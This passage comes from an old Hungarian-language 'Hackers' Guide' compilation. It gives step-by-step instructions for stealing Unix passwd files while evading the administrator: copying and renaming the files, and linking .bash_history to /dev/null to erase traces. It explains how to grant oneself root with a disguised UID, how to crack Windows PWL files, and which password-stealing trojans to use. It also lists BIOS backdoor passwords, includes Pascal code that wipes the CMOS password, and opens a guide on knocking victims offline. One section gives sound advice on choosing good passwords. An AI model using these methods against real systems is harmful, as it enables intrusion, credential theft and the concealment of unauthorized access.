* igazából nem ezt a pw-t kaptam Ja még 1 fontos dolgok. Hasonlitsuk még 1* össze azt a két sort: root:Fpkd1rH58rmi:0:0:root:/root:/bin/bash uservagyok:Hgjrhhr851h:1000:1000:GECOS,,,:/home/uservagyok:/bin/bash Akkor most nézzük meg miben tér el az 1ik sor a másiktól?? Hát abban, hogy a szemét rootnak a felhasználó azonosítója 0 és a felhasználó csoport azonosítója is 0. Hát igen, ha neked is ez lenne a nevet mellet, akkor te is root lennél. Namost:)) Ez 1 kicsit eltér a témától. De most már mind1, ha belekezdtem. Ha valamilyen módszerral tudsz írni a pw fileba az jó.(pl: sendmail módszer stb.., de erről részletesebben másik cikkben majd) És miért jó??? Hát azért, mert a root jelszavát nem tudod, de ha adott rendszerben Te user vagy akkor tudsz adni magadnak root jogokat. (a saját pw-det +csak tudod). DE, semmi esetre se és neki a fájlnak, és kezd el 0:0 gépelni, mert rá fogsz szívni.. Azért, mert az összes ellenőrző program (ha van ilyen a rendszeren) jelezni fog, hogy problem van. Arról nem is beszélve ha a root kiadja a finger parancsot akkor feltűnő lesz, hogy 2 root is van a rendszeren..... Ilyenkor legjobb azt csinálni, hogy megadod pl: ezt 262144:262144 Ez azért jó, mert 2-nek magasabb hatványait +adva is root jogokat kapunk. Erre azonban már nem figyelnek a prg-k. Sőt, a finger parancs kiadása után is csak azt látja root, hogy 1 sima user van bent. höhö ql. De ez max. 1-2 óráig/napig jó, mert ha belenéz a gazda a pw filebe látni fogja, hogy nem ok a systemben valami..... Hát akkor végeztünk is volna ezzel. 1 kis összefoglalás. A lényeget leírtam. A részletesség néhol a minőség rovására ment, abból a tekintetből, hogy néha már olyan részletes volt, hogy elröhögtem magam. (de ezzel nyaggattatok, hogy részletes legyen ám). A módszer szerintem elmegy pl: 4-5 karakteres pw-ket amikben esetleg van szám is esetleg kis/nagy betű keverve 1 olyan 3-4 nap alatt +fejt. Legtöbbször a root jelszót is. A 7-8 karakteres speckó symbólokat is tartalmazó pw-k suxx. 1-2 hétnél tovább nem érdemes fejteni 1 pw-t se!! mert az vagy több száz év alatt megy, de lehet hogy +van 1 hónap alatt, de addigra már lehet +változtatták. Szóval ez van srácok..... Dodge Viper http://w3.swi.hu/dviper
************************************************************************************************ 18 7
Hackers’ Guide
Passwd
A passwd filet Linuxokon a /etc -be találhatjuk meg és ott a passwd file név alatt. Ha a serveren shadow található ne is próbálkozzunk azt letölteni mert ugysem lehet. Ha meg hozzá szeretnénk jutni vagy rootnak kell lennünk a serveren vagy megkell törnünk azt , de ha már megtudjuk törni akkor felesleges ezt a szöveget olvasni. :-) Ha úgy szeretnánk leszedni a passwd filet hogy a root ne vegye észre akkor próbáljuk meg átmásolni a home könyvtárunkba. Ha sikeresen átmásoltuk nézzuk meg hogy esetleg nincs e régebbi lementett passwd file amihez hozzá férhetünk, majd utána ezeket is másoljuk át. Ha mind ezzel meg vagyunk , nézzük át a passwd filet hogy használni tudjuk e. Ha minden rendben van érdemes ezeket átnevezni , mert a root ha egyszer megnézi az ftp logokat érdekes dolgokat fog benne látni. Tehát ha pl: a login nevunk dudu akkor érdemes egy dudu.txt -re átnevezni oket mert az nem olyan feltüno. Ha esetleg több passwd fileunk is van akkor tar gzipeljuk oket össze így: tar -czvf dudu.tar.gz passwd* . Majd ha sikeresen letöltöttük akkor vizsgáljuk meg a .bash_history -nkat.. hogy az egészbol mi található benne. Ezt érdemes letörölni majd átlinkelni a /dev/null -ba , azt így: ln -s .bash_history /dev/null . Ezt érdemes a passwd lopás elott megcsinálni. Természetesen ezt az egészet csak akkor csináljuk meg ha a root nincs bent a serveren. Ha minden nyomot sikeresen eltüntettünk akkor már csak egy password crackerel kell megnézni a passwd filet mi mindent tudunk belole megtörni. Dudu
************************************************************************************************
Re: Passwd H3XR00T nem említett pár érdekességet a jelszófile-al kapcsolatban. Abban a szerencsétlen esetben, ha valakinek nincs a jelszava helyén semmiféle karakter (pl., kutya::666:666:Kiskutya:/home/kutyuli:/bin/bash ), az adott felhasználónévvel belépve nincs szükség jelszó használatára. A 0-s uid-al rendelkezô felhasználóknak rendszergazdai jogosultságaik vannak. Bizonyos rendszerek 2 magasabb hatványait is 0-s UID-nak kezelik - ilyen például a 131072, aminek gazdája szintén élvezheti a rendszergazda jogait. "root:/root:/bin/bash: Ez elvileg a shell mit az user használhat, kaphat" - írta
18 8
Hackers’ Guide
H3XR00T. Az elsô "root" a felhasználónév az elöbbi részletben, a második a home könyvtár, és csak a harmadik shell. THX kiegészítésért ViDe0! =) Eredeti: ViDe0 - H3XR00T http://hexnet.hpage.net/
************************************************************************************************
PWL Hacking Tutorial PWL=PassWord List. A Windows alapú rendszerek ilyen kiterjesztésu fájlokban tárolják a jelszavakat, a gépen levo felhasználók felületéhez. És ez még nem minden, ezekben a fájlokban el van tárolva mindaz, amivel a kapcsolatba kerültél jelszó szinten, pl ha egy internetes laphoz kód kell (szabvány kódbekéro) akkor ez is ezekben a fájlokban tárolódik. A Win 95 OSR2 és a WIN98 PWL formátuma megegyezik, a Win NT más biztonsági modellt használ, az alap W95-é pedig elég szegényes... :-) Tehát a PWL-ben az alap felhasználó felülethez tartozó jelszó MELLETT további jelszavak is lehetnek, melynek típusai: Res. Type: Link Ez az említett internetes oldalra a jelszó Res. Type: Mail Helyi hálón a levelezoszerverhez a hozzáférés Res. Type: Dial Hát igen, ez a leghasználhatóbb, mégpedig a Dial-Up (Telefonos hálózat) jelszava Biztosan van még, ezekkel találkoztam. A továbbiakban a W95OSR2/W98 pwl állományait tekintsétek defaultnak, arról beszélek. :) Ha a pwl fájl csak a felhasználói felületet orzi, nincs benne eltárolva semmi pluszinformáció, akkor a mérete 688 bájt. Ha internetes jelszó szerzésére adtad a fejed, akkor az ilyen fájlokkal fölösleges foglalkoznod. Ha ennél nagyobb a méret, akkor biztos lehetsz benne, hogy van valamilyen ajándék a fájlban... :) Ezek a jelszavak természetesen kódolt formában találhatók meg a fájlban. Tehát egy szimpla F3-mal nem tudod megnézni ezeket az információkat. Ha plusz információkat (ezt nevezik cached passwords-nek) szeretnéd megtudni, akkor is
18 9
Hackers’ Guide
szükséged van a pwl-hez tartozó jelszóra, hiszen az ebbol álló/keletkezo kulccsal van kódolva az is. Ami még a PWL mellett szól, hogy a nyitójelszója (tehát nem a cached passwords) nem case sensitive, azaz nincs benne kis/nagybetu megkülönböztetés. Ennek akkor van nagy jelentosége, ha nekiállsz Brute Force-szal törni, de errol majd lejjebb. Kaptam egy kedves levelet, amiben a PWL törésnél jobb módszert mutattak... hehe... csak egy két apróság van benne buktatóul. Tehát mint említettem a plusz információ a lényeg. Ennek a megtudásához IS a pwl jelszavára van szükség. Létezik olyan program (pl.: pwlcrack) ami megmutatja a cached password-öket viszont az AKTUÁLIS felhasználóét. Ha egyszer már belépett az ember, akkor a jelszava már nyilván adott, és így tud hozzáférni a program ezekhez. Tehát ha egy hazahozott PWL-lel van dolgod, akkor ez a módszer nem jöhet számításba. Ha viszont nem figyel oda az ismerosöd, vagy internetes kávéház, vagy ilyen helyre tévedsz, akkor valóban sok hasznát lehet venni. Természetesen, azt mondanom sem kell, hogy NE lemezen vidd magaddal, (engem is kitiltottak a könyvtárból miatta... :( ), hanem küldd el egy ingyenes mail címre, amihez ott is hozzáférhetsz. Oszintén szólva viszont, amelyik ingyenes hely ilyen lazán veszi a dolgot, hogy a saját felhasználó felületen hozzáférést enged a jelszavakhoz, az magára vessen... :) Viszont láttam olyan megoldást, hogy az internetes jelszóhoz csak a rendszergazda fért hozzá, és a többi felhasználó a szerveren keresztül csatlakozott az internetre. Ebben az esetben sem ér semmit ez a pwlcrack. (Ja, a DialPwd egyes vírusírtók szerint trójaival fertozött! Semmiképpen sem javaslom.) Mi volt a megoldás? Haza kellett vinni az összes PWL-t, és nekiállni a feltörésnek. Hogyan törjük? A PWL fájloknál egy alapvetoinformációra van szükség a töréshez, különben fölösleges vele szenvedni. Az egyik a felhasználónév. Ezt a Windows is kiírja a vezérlopult/felhasználók menüben, illetve a fájl nevébol is lehet rá következtetni. (Vagy pwlhack-kel a /grab opció) A Windows a system.ini-ben tartja, hogy melyik pwl-hez milyen felhasználónév tartozik. Ha van egy petra.pwl nevu fájlod, akkor a felhasználónév tuti hogy Petra. Kis nagy betu nem számít. (Ékezetben viszont lehet, ezt nem tudom.) A Windows az alapján adja a fájlnevet, hogy mi a felhasználónév. Csak 8 karaktert használ, tehát a rendszer.pwl felhasználóneve lehet rendszer, de lehet akár rendszergazda is. Az ékezeteket nem haszál a Windows. Ha két ugyanolyan fájl keletkezne, akkor az újabbnak egy számot rak a végére. Ezért szerencsés inkább a megnézni a system.ini-ben... Megvan a felhasználónév, most már csak a jelszóra van szükség. Két módszert szeretnék bemutatni, alapveto törési eljárások :) Dictionary Attack: Ez azt jelenti, hogy egy szótárállományból a töro program végigpróbálja az összes szereplo szót. Ez akkor hasznos, ha a hülye felhasználó valami gyakori kódot adott meg. (pl: titanic) Elonye a módszernek hogy gyors, és (tapasztalat) gyakran sikeres. :) Szükség van a szótárállományra, jobb programok mellé adják, és természetesen sajátot is lehet használni. Az külön extrának számít, ha néhány variációt is kipróbál a program soronként, például mellérak egy számot (kutyus01, kutyus02, stb.) vagy megpróbálja a fordítottját. (dog->god) Brute Force: Nyers ero. Hogy miért ilyen hülye nevet adtak neki, az szerintem örökké rejtély 190
Hackers’ Guide
marad. Talán azért, mert az ilyen módszerhez elég eros processzorú gépre van szükség, hogy elviselheto legyen a sebesség. Még mindig nem mondtam hogy mi ez... tehát ezzel a módszerrel a kódtöro az összes létezo variációt próbálja végig. Ez természetesen a jelszó hosszúságával arányosan no (hatványosan...). A választható karakterek száma határozza meg a lehetoségek számát (kombinatorika). Pl. egy angol szó a jelszó, nincs benne ékezet, nincs benne szám, nincs benne más karakter, akkor a használható angol ábécé 26 karaktere jöhet számításba, és így mondjuk egy öt karakteres jelszó esetén a lehetoségek száma 26*26*26*26*26, azaz 26^5. Ez 11881376. Értheto így már, hogy miért tart ez hosszabb ideig? :) Elonye viszont kétségkívül az alaposság és hogy nem marad ki semmi, meg hogy tuti meglesz az amit keresel... :) A sebességrol nem szeretnék mondani, mert függ a processzortól, függ a karakterek számától... Most már csak egy dolgot nem mondtam el, hogy milyen szoftverekkel állhatunk neki dolgozni... GLIDE: Amit semmiképpen nem ajánlok, az a Glide. Egyszeruen sehogyan sem sikerült a programot muködésre bírni. Felhasználónevet alapértelmezésként a fájlnévnek tekinti, és folyton kérdez. Csak Brute Force-ot támogat. Cached Passwords-ot nem tudja, és úgy néz ki, hogy csak az alap W95 fájljaihoz jó. Egyetlen elonye talán az, hogy egy C++-ben írt forrást adnak mellé. Természetesen sz@rra nem lehet építkezni... :) PWLCRACK Egyes hackeroldalon hangoztatott állításokkal szemben a PWLCRACK egy Win32 alkalmazás, nem indul el DOS alatt. Az más kérdés, hogy karakteres képernyot használ, nem ablakozik. De persze ennek köze sincs az OS-hez, de ezt hagyjuk. A program csak a cached password-öket írja ki. Szabvány API hívással muködik. DIAL-UP Az elozohöz hasonló program, szintén csak a cached passwordshöz jó. Külön elonye, hogy kiír a Windows registrybol is minden használható információt az internetes beállításokra vonatkozólag. Tehát DNS szerverek, IP cím, login script, stb. PWL HACK: Ez egy jó kicsi, orosz program. Elonye az elozovel szemben, hogy muködik. :) Támogatja a Brute Force, és a Dictionary módokat is, és a megszakított keresést is folytatni tudja. Van mellé egy kis forrás is C, természetesen. A megfejtett külso PWLbol is, sot az aktuális felhasználó cached passwords-ét is kijelzi, tehát a PWLCRACK progi lehetoségeit is magában foglalja. Van még neki az említett grab funkciója, ami kimenti a felhasználóneveket. A spy funkció látja el a PWLCRACk dolgát. Nagyon gyorsan dolgozik a BruteForce-szal, lényegesen gyorsabban mint a Wines társai. Az progi dpmi alkalmazás, fut DOS-ból és Winbol is. Nem grafikus a felülete, paraméterezgetni kell. Az elozo progik kicsik, ennek a mérete viszont 400k körül mozog. A SAC-on is megtalálható :) CAIN & ABEL: 1. Képernyovédo jelszava, rögtön és kapásból. 2. Külso regisztrybol ugyanez.
191
Hackers’ Guide
3. A számítógépen levo fájlmegosztást, nyomtatómegosztást stb. jelszavait is kapásból megmutatja. 4. Pwlcrack is, tehát aktuális felhasználó cached passwordjei. 5. Egy PWL töro, Dictionary, és Brute Force elven is, és egész jó WordListet adnak hozzá!! 6. Helyi hálón levo shared jelszavak kijelzése (Sajnos csak egy gépem van, nem tudtam kipróbálni.) 7. Abel client. Ez egy BO szeru administrator tool :) gyengébb képességekkel, elsosorban jelszóra kiélezve. Muködik LAN-on és Interneten is. Az Abel szerver benne van a Cain 1.51-ben, ami mellesleg FREE szoftver is, az 1.0 még fizetos volt. Természetesen crack létezett hozzá... :) Sajnos viszont a BreakDance rakott az Abel szerverbe egy figyelmezteto ablakot, hogy "You are under monitoring", szóval nem az igazi... Van neki egy toggle password caching funkciója, amivel ki lehet kapcsolni, hogy a Windows megjegyezze a jelszókat. Ekkor viszont minden alkalommal újra be kell írni oket. El tudja távolítani az aktuális felhasználó cached resources bejegyzéseit. Az egész program Win alapú, szép, könnyu kezelofelülettel. Egy hátránya, hogy az elozo 10k-s programok mellett ez 600k fölött van. PWLTOOL A Cainnak egy komoly vetélytársa. Mondhatjuk azt, hogy mindent tud, amit az elozorol elmondtam. Képernyovédo, shared passwords, cached passwords, stb. Brute Force, Dictionary, és még ketto törési mód van benne. A töréshez lehet a szabvány API hívás, és a program "módszere" között választani. Természetesen ez utóbbi lényegesen gyorsabb. Sokkal jobb sebességeredményt lehet így elérni. Ebben is megtalálható a password lopáshoz egy kis trójai program. Úgy elbújik, hogy még a trayben sincs, sot ctrl+alt+del-re sem jön elo. A programnak egy nagy hibája van. Nagyon pénzéhes, és regisztráltatni akarja magát. Hát ez felháborító! Nem gondoljátok? Nincs valakinek a hatos verzióhoz törése? A történet vége, ennyi és kész! RSC (TM)
************************************************************************************************
Password fileok keresése Ez a táblázat leírja hogy különbözõ operációs rendszerekben hol találod a passwd fajlt !
192
Hackers’ Guide Version Path Token ----------------------------------------------------------------AIX 3 /etc/security/passwd ! vagy /tcb/auth/files// A/UX 3.0s /tcb/files/auth/?/* BSD4.3-Reno /etc/master.passwd * ConvexOS 10 /etc/shadpw * ConvexOS 11 /etc/shadow * DG/UX /etc/tcb/aa/user/ * EP/IX /etc/shadow x HP-UX /.secure/etc/passwd * IRIX 5 /etc/shadow x Linux 1.1 /etc/shadow * OSF/1 /etc/passwd[.dir|.pag] * SCO Unix #.2.x /tcb/auth/files// SunOS4.1+c2 /etc/security/passwd.adjunct ##username SunOS 5.0 /etc/shadow System V Release 4.0 System V Release 4.2 Ultrix 4 UNICOS
/etc/shadow /etc/security/* database /etc/auth[.dir|.pag] /etc/udb
x * *
D3viL^Woodoo ************************************************************************************************
Hogyan válasszunk rossz jelszót Ez a cikk fordítás, de sajnos nem tudom az eredeti szerzot, mert az angol cikkben nincs feltüntetve. Miután szereztél egy accountot egy számítógépre, meg kell választanod a jelszót hozzá. A jelszó megvédi a munkádat a számítógépen. Vannak jó jelszavak és rossz jelszavak. A rossz jelszó lehetové teszi másoknak, hogy használják az accountodat és elolvassák a fájlokat, vagy letöröljék a munkádat. Feltételezem, hogy nem akarod, hogy valaki más megtegye ezt, de ha mégis ezt akarod, akkor az alábbiak szerint kell eljárnod, hogy könnyebbé tedd a dolgát: 1. Ha azt akarod, hogy nagyon könnyu dolga legyen, akkor a jelszó legyen a felhasználói azonosító, vagy a neved. Ez az, amit a jó feltöroprogramok eloször kipróbálnak. 2. Ha ez nem tetszik, akkor a jelszó legyen a nickneved, a középso neved, vagy a születési éved, vagy egyéb információ, amihez bárki publikusan hozzájuthat egy nyilvántartásból vagy a finger paranccsal. 3. Legyen a jelszó a barátnod/barátod/testvéred/háziállatod/gyereked neve. (Ha láttad a War Games címu filmet, akkor visszaemlékezhetsz, hogy a szuperszámítógép jelszava Falken professzor fiának a neve volt: Joshua.) 4. Vagy válassz valami egyszeru, könnyen megszerezheto információt, pl. a telefonszámodat, az irányítószámodat, vagy a születésnapod dátumát, stb.
193
Hackers’ Guide
5. Használj szavakat vagy neveket Sci-fi vagy fantasy könyvekbol vagy filmekbol. A jelszófeltöro gyerekek imádják ezeket, szóval egyszeru lesz nekik kitalálni. Ha szépirodalomból vagy ókori mitológiából választasz egy nevet, akkor ezeket a gyerekeket kizárod, és csak a muvelt crackereknek marad esélyük. 6. Ha egy kicsit nehezebbé akarod tenni a munkájukat, használj egy szót valamelyik szótáradból. Most, amikor már elérhetoek némely online szótárak, bárki írhat egy programot, amelyik végigpróbálja ezek adatbázisát, amíg meg nem találja a megfelelot. Lassú, de sokszor muködik. Namost, ha nem tetszik, hogy valaki más bejuthat az accountodra és elolvassa a leveleidet és letörölje a fájlokat, akkor itt van néhány tipp, hogy hogyan válassz *jó* jelszót magadnak: 1. A legjobb jelszó betuk, számok és egyéb karakterek keveréke. Minél komplexebb és véletlenszerubb, annál nehezebb lesz feltörni. Természetesen nehéz lesz megjegyezni, tehát próbálj olyan bonyolult jelszót választani, amit azért könnyu megjegyezni, de másnak nehéz feltörni. 2. Legalább 6 karakter hosszú legyen a jelszó. A rövidebb jelszavakat programokkal rövid ido alatt fel lehet törni. Az Unix újabb verziói csak minimum 6 karakter hosszú jelszavakat fogadnak el, és legalább egy karakternek kell benne lenni, ami nem betu. De ne feledd! Az Unix jelszavak csak 8 karakter hosszúak - a többit levágja a rendszer. 3. Ha csak egy számot vagy szimbólumot adsz egy szóhoz, az kicsit biztonságosabbá teheti a jelszót, de ha a szó egy szótári szó, akkor ez nem elég. Egy ismert jelszófeltöro program könnyedén megfejtette ezt a jelszót: "offbeat1". Sokkal jobb kombináció az "off1beat". 4. Használj szótöredékeket, szokatlan módon összekeverve, hogy ne forduljon elo egyetlen szótárban sem; vagy végy egy összetett szót és cseréld fel a darabokat szokatlan módon. A fenti jelszó még jobb, ha felcseréled az "off"-ot a "beat"-tel. 5. Az obszcén szavak általában nem jó jelszónak, mert bár nem fordulnak elo szótárakban, de sok jelszótöro program éppen emiatt külön ellenorzi oket. 6. Végy egy szót és helyettesítsd egyes betuit szimbólumokkal. De ne legyen túl egyszeru. Sok program elég okos ahhoz, hogy az "s" betu helyére "$" -t helyettesítsen, vagy "1"-et a "l" és az "I" helyére. 7. Egy jó módja a jó jelszóválasztásnak, hogy egy kifejezés szavainak kezdobetuit veszed jelszónak. Pl. válassz egy versszakot egy versbol, és a szavak vagy sorok kezdobetuit vedd jelszónak. Ez eléggé véletlenszeru karaktersorozatot ad, amelyet te könnyen megjegyezhetsz, de nehéz feltörni, és ha valaki látja, nehezen tudja megjegyezni. 8. Egyes betuket nagybeture változtatni, vagy fordítva (pl. PasSworD) nehezebbé teszik a feltörést, de nem lehetetlenné. 9. Lejárt rendszámok, jogosítványszámok jók jelszónak, de a jelenlegi adataidat soha ne használd. Az NCC-1701 nem jó jelszó - túl sok cracker nézi a Star Treket.
194
Hackers’ Guide
10. Nem angol nyelvu kifejezések jobbak, mint az angol nyelvuek, de ha a cracker tudja, milyen nyelven van, megválaszthatja a megfelelo nyelvu szótárfájlt. Használj egy nem angol szót, és kombináld valamelyik fenti trükkel: ez eros jelszót ad, és könnyen megjegyezheted. Itt van még egy pár tipp: 1. Gyakran változtasd meg a jelszavadat. Még ha valaki fel is töri a jelszavadat, nem sokáig tudja majd használni. Nehéz lehet ezt a szabályt betartani, kösd valami más eseményhez. Például ha minden hónapban megváltoztatod a jelszót, akkor pl. tedd akkor, amikor befizeted a számláidat, vagy változtasd meg mindig, amikor matekból dolgozatot írtál. Néhány számítógép "password aging" -et használ, ami arra kényszerít, hogy gyakran változtasd meg a jelszót. Ez hasznos dolog, ha nem túl gyakori ahhoz, hogy idegesíto legyen. 2. Soha ne add oda a jelszavadat senkinek. A számítógép rendszergazdájának nincs rá szüksége, és amúgy is ki tudja találni (egy cracker programot futtatva a saját rendszerén). Ha valakitol olyan levelet kapsz, amelyben a jelszavadat kérik, az bizonyára egy cracker. Jelezd a rendszergazdának. 3. Ha szerinted valaki látta, amikor beírtad a jelszót, minél hamarabb változtasd meg. Unix rendszereken ezt a "passwd" paranccsal teheted meg. 4. Ha csak egy mód van rá, ne írd le a jelszót. Ha mégis le kell írnod, ne jelöld meg, hogy mihez van a jelszó. Ha valaki ilyet lát a számítógépeden, hogy "xyzzy", akkor még nem tudja, mi az, de ha ezt látja "a jelszavam xyzzy", akkor már igen. (Egyébként xyzzy egy kulcsszó egy számítógépes játékban, tehát amúgy sem jó jelszó :) 5. Ha több számítógépen dolgozol, és nem ugyanazt a jelszófájlt használják, akkor mindegyik számítógépen használj más-más jelszót. Ha valaki feltöri az egyik jelszavadat, akkor attól még a másikba nem jut be. 6. Ne küldj jelszót e-mailen keresztül. Az e-mail nem olyan biztonságos, mint gondolod.
************************************************************************************************
CuteFTP bizonytalan jelszótárolása Ez a cikk fordítás, az eredeti cikket írta: cube [email protected] A CuteFTP egy fájlban tárolja a jelszavakat egyszeru karakter cserével, ezeket könnyen nyeri egy kódoló táblából. Ezzel lehetové teszi a távoli támadásoknak, hogy visszakódolják a jelszavakat, amik a SMDATA.DAT fájlban vannak tárolva. A rekordok egy speciális jelek alapján vannak elosztva, amit felváltanak a mezok
195
Hackers’ Guide
számai, amik néha különbözo ASCII karakterek alapján vannak behatárolva. A rekordok ilyen formában vannak tárolva: $? RECORD NAME ? IP ADDRESS ? USERNAME ? ENCRYPTED PASSWORD ? (a ? egy speciális karaktert jelent). A mezok részei vagy üresen vannak hagyva, vagy tartalmaznak egy kevés információt. A kódolás egy ismert egyszeru szöveg, a kódoló algoritmus könnyen levezetheto. A kódolás elvégzi a jelszó karakterek cseréjét més ASCII értékekre - a=? b=? stb. A CuteFTP a "session"-ok létrehozásakor ellátja jelszavakkal, mint abcABC stb., könnyen megszerezheted az egyes karakterek pontos kódoló értékeit. Ha egy betolakodó halózati vagy fizikai hozzáférést szerez az SMDATA. DAT fájlhoz, akkor a jelszavaidnak lottek :). A betolakodó képes lesz kiszedni minden szükséges információt az SMDATA.DAT fájlból, hogy feltörje az eléréseidet. A szükséges program forráskóddal:cuteftp.zip Scalpal
************************************************************************************************
BIOS Hátsóajtók A legtöbb BIOS gyártó beépített bizonyos hátsóajtókat. Általában nem publikálják őket, mert kicsit "égő" dolog, hogy ezek után bármilyen BIOS jelszó megadása semmit sem ér... =) Például az AWARD BIOS simán "feltörhető" az AWARD_SW, AWARD_PW és j262 (kis és nagybetű különbözik!) joker jelszavakkal. AMIBIOS-nak is van joker jelszava. Ez a BIOSTAR, vagy esetleg AMI. Az alábbi helyeken még találhatsz további infókat: http://www.hedgie.com/passwords/bios.html http://hem.passagen.se/unaxor/cracking.html http://www.voicenet.com/~raze/files/textfaq/pchack.txt http://www.geocities.com/Area51/Zone/6430/cracking.html - H3XR00T http://hexnet.hpage.net/
************************************************************************************************
196
Hackers’ Guide
BIOS jelszavak feltörése Ez foleg attól függ, hogy a gépben milyen BIOS van a gépben. A leggyakoribb BIOS fajták az Award, AMI, Phoenix. Biztos léteznek más BIOSok is, de én még más típust nem láttam. A legtöbb BIOS-ban be lehet állítani egy jelszót, amit szorgalmasan kér is, amikor hozzá akarsz férni a CMOS setuphoz, illetve bootolni akarsz. A gyártók szerintem minden BIOS-ba beépítettek gyári jelszavakat, amikkel be lehet lépni bármikor, de ezeket nem kötik az orrunkra :) Itt van egy lista, az általam ismert beépített jelszavakról, én nem tudtam mindet kipróbálni, nekem az AWARD_SW muködött, de azért érdemes próbálkozni ;) AWARD: 01322222, 1EAAh, 256256, 589589, 589721, ?award, AWARD PW, AWARD SW, AWARD?SW, AWARD_PW, AWARD_SW, Award SW, CONCAT, CONDO, HELGAS, HEWITT RAND, HLT, J64, KDD, PASSWORD, SER, SKY_FOX, SWITCHES_SW, SZYX, Sxyz, TTPTHA, TzqF, ZAAADA, ZBAAACA, ZJAAADC, _award, aLLy, aPAf, admin, alfarome, award, award.sw, award_?, award_ps, awkward, bios*, biosstar, biostar, condo, djonet, efmukl, g6PJ, h6BB, j09F, j256, j262, j322, j64, lkw peter, lkwpeter, setup, t0ch20x, t0ch88, ttptha, wodj, zbaaaca, zjaaadc AMI: 589589, A.M.I., A.M.I., AMI, AMI SW, AMI!SW, AMI.KEY, AMI?SW, AMIPSWD, AMISETUP, AMI_SW, AMI~, BIOS, BIOSPASS, CMOSPWD, HEWITT RAND, KILLCMOS, Oder, PASSWORD, aammii, ami.kez, amiami, amidecod, amipswd, ami°, bios310, helgaßs Amptron Polrty AST: SnuFG5 Biosstar: Biostar, Q54arwms Compaq: Compaq Concord: last CTX International:
197
Hackers’ Guide
CTX_123 CyberMax: Congress Daewoo: Daewuu Daytek: Daytec Dell: Dell Digital Equipment: komprie Enox: xo11nE Epox: central Freetech: Posterie HP Vectra: hewlpack IBM: IBM, MBIUO, sertafu Iwill: iwill JetWay: spoom1 Joss Technology: 57gbz6, technolgi M Technology: mMmM
198
Hackers’ Guide
MachSpeed: sp99dd Magic-Pro: prost Megastar: star Micron: sldkj754, xyzall Micronics: dn_04rjc Nimble: xdfk9874t3 Packard Bell: bell9 QDI: QDI Quantex: teX1, xljlbj Research: Col2ogro2 Shuttle: Spacve Siemens Nixdorf: SKY_FOX SpeedEasy: lesarot1 SuperMicro: ksdjfg934t Tinys:
199
Hackers’ Guide
tiny TMC: BIGO Toshiba: 24Banc81, Toshiba, toshy99 Vextrex: Vextrex Vobis: merlin WIMBIOS v2.10: Compleri Zenith: 3098z, Zenith ZEOS: zeosx Egyéb BIOSok, de próbálkozhatsz a AWARD-nál és AMI-nál is: ALFAROME, BIOSSTAR, biosstar, BIOSTAR, biostar, LKWPETER, lkwpeter, Syxz, Wodj Érdemes még próbálkozni a kis/nagy betuk cserélgetésével is... Ha nem tudsz bootolni a géprol - mert pl. rajta van egy System Commander - akkor ezek után már csak fizikai megoldás létezik. Két lehetoség van, az egyik az, hogy kiszedjük az alaplapról az elemet. Ekkor elvileg elveszti a CMOS memória a tartalmát, de általában szoktak beépíteni valami átmeneti tárolóáramkört, amivel még kibírja a memória az elemcserét. Ez az ido minden gyártónál más. (Ezt is ki lehet játszani egy ellenállás segítségével.) A másik módszer viszonylag egyszerubb, meg kell keresni az alaplapon a CMOS RAM Clear jumpert, majd rövidrezárni, és bekapcsolni a gépet. Ezután kikapcsoljuk a gépet és leszedjük a jumpert. Egy újabb bekapcsolás után üres, jelszómentes CMOS RAM-mal találjuk magunkat szembe :) Könnyebb a dolog, ha tudsz bootolni a géprol, mondjuk DOS/Win9x alá. Ilyenkor szoftveresen ki lehet loni a jelszót. Nem árt elotte elmenteni a CMOS tartalmát, hogy vész esetén vissza tudjuk tölteni. Itt van két sor Pascalban, ami kinyírja a jelszót: port[ $70 ] := $2e; port[ $71 ]:=port[ $71 ] + 1;
200
Hackers’ Guide
Az a lényege, hogy átír egy értéket a CMOS RAM-ban, de van egy ellenorzoösszeg a végén, és ez most hibás eredményt fog visszaadni. Ha ezt alkalmazod akkor elvesznek a winyók+floppyk beálltásai, meg az ido is.. Újraindítás után a BIOS vagy nem kér kódot, vagy felajánlja, hogy betölti az alap beállításokat, mintha bejumperelted volna a Clear CMOS RAM-ot :) Ez nem muködik NT alatt. Itt van egy másik programrészlet is, ami elmenti a CMOS tartalmát egy fájlba: var i, c : byte; cmosfile : file of byte; begin assign( cmosfile, 'cmos.ram' ); rewrite( cmosfile ); for i := 0 to 127 do begin port[ $70 ] := i; c := port[ $71 ]; write( cmosfile , c ); end; close( cmosfile); end. Mûködése egyértelmû, úgymint a következõ programrészletnek, ami a visszaírást végzi: (Talán annyit, hogy azért 10h címtõl kezdi, és nem 00h-tól, mert az elsõ Fh címü bájtokon állandóan változó információk találhatóak pl: óra, perc, évszám, leállás oka, stb.) var i, c : byte; cmosfile : file of byte; begin assign( cmosfile, 'cmos.ram' ); reset( cmosfile ); for i := $10 to 127 do begin port[ $70 ] := i; read( cmosfile , c ); port[ $71 ] := c; end; close( cmosfile ); end. Így észrevétlenül tudunk piszkálni a gépen, egyszerûen vissza lehet állítani az eredeti cmos tartalmát. Ezenkívül még ott van az a lehetõség is, hogy valami kis progival kiíratjuk a jelszót. Ilyen progit még csak egyet láttam, ami normálisan mûködött is (nálam), de sajna elveszett :(. Némely AMI biosokban van egy elég érdekes lehetõség is, ha nyomvatartod bootoláskor az End gombot, akkor törli a CMOS RAM tartalmát. Biztonság rulez! Sun-Zero [email protected]
201
Hackers’ Guide
************************************************************************************************
Denial of Service (DoS)
Hogyan "lőjjünk" ki másokat a netről? Ebben az ismertetőben megpróbálom elmagyarázni a módszereket melyekkel kilőhetsz embereket a netről. Azt nem garantálom, hogy 100% működnek de azért 1 próbát megér! =) 1. Előszöris szerezz be egy jó és gyors! portscannert. Ez azonkívűl, hogy a Conseal felhasználókat meglepi vagy 10000 popup ablakkal =)) arra jó, hogy kiderítsd, hogy mégis milyen programok futnak a rendszeren, (mely portok vannak nyitva) vagyis, hogy hol vannak a leendő áldozatodnak a gyenge pontjai. 2. Ezután meg kell szerezned az áldozat IP-címét, hogy tudd támadni, vagy szkennelni. Ilyen számot elég egyszerű szerezni. Ha IRC-n vagy akkor egyszerűen beírod, hogy /dns nick (Értelemszerűen a nick helyére a megtámadni kívánt személy irc-s beceneve kerül). ICQ alól, az ICQ programod megpatkolásával szerezheted meg az illető IP-jét. A harmadik módszer az, hogy megnézed a netstat paranccsal, hogy milyen IP-k csatlakoznak msot hozzád. Valószínű ott lesz az áldozat IP-je is. 4. OK. Mostmár megvan az illető IP-je. Mostpedig vedd elő a gyors kis portscanneredet és futtasd végig az áldozat IP-jén, hogy megnézd mely portok vannak nyitva. Fontos, hogy tudd, hogy melyik portszámhoz mi 